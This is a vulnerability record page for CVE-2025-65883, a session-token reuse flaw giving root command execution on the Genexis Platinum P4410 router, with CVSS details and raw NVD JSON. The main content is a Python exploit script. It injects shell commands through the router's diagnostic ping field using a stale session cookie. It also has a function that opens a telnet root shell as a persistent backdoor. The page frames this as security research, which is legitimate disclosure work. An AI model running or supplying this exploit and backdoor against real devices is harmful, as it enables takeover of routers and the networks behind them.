CVE-2025-65883

Description

A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2–1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router’s diagnostic endpoint, resulting in command execution as root.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.41:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:genexis:platinum_4410:-:*:*:*:*:*:*:* - NOT VULNERABLE

Genexis Platinum P4410 Firmware P4410-V2-1.41

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65883 PoC - Genexis Platinum P4410 Session Token Reuse RCE
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import re

def exploit_session_reuse(target_ip, session_token, command):
    """
    Exploit improper session invalidation to execute commands as root
    
    Args:
        target_ip: Router's IP address
        session_token: Valid session token (may be stale)
        command: Command to execute on the router
    """
    # Diagnostic endpoint typically accessible at /diagnostic.htm or similar
    url = f"http://{target_ip}/diagnostic.htm"
    
    headers = {
        'Cookie': f'SESSIONID={session_token}',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (compatible; Router-Exploit-Test/1.0)'
    }
    
    # Payload structure depends on specific diagnostic functionality
    # Common injection points: ping_host, traceroute_target, dns_query
    data = {
        'action': 'ping',
        'ping_host': f';{command};#',  # Command injection
        'count': '1'
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Command executed successfully")
            print(f"[*] Response:\n{response.text}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

def enable_telnet(target_ip, session_token):
    """
    Enable Telnet service as a persistent backdoor
    """
    command = "busybox telnetd -p 23 -l /bin/sh"
    return exploit_session_reuse(target_ip, session_token, command)

def main():
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2025-65883.py <router_ip> <session_token> <command>")
        print("Example: python3 cve-2025-65883.py 192.168.1.1 ABC123DEF456 'id'")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    session_token = sys.argv[2]
    command = sys.argv[3]
    
    print(f"[*] Targeting {target_ip} with session token: {session_token}")
    print(f"[*] Executing command: {command}")
    
    exploit_session_reuse(target_ip, session_token, command)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65883
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65883
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65883/
[4] VulDB https://vuldb.com/cve/CVE-2025-65883
[5] https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65883", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.770", "lastModified": "2025-12-23T00:22:22.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2–1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router’s diagnostic endpoint, resulting in command execution as root."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.41:*:*:*:*:*:*:*", "matchCriteriaId": "5DA36573-1FE6-457C-886A-1D8F60D40890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:genexis:platinum_4410:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B251415-2EA1-4887-90C9-44231233138C"}]}]}], "references": [{"url": "https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}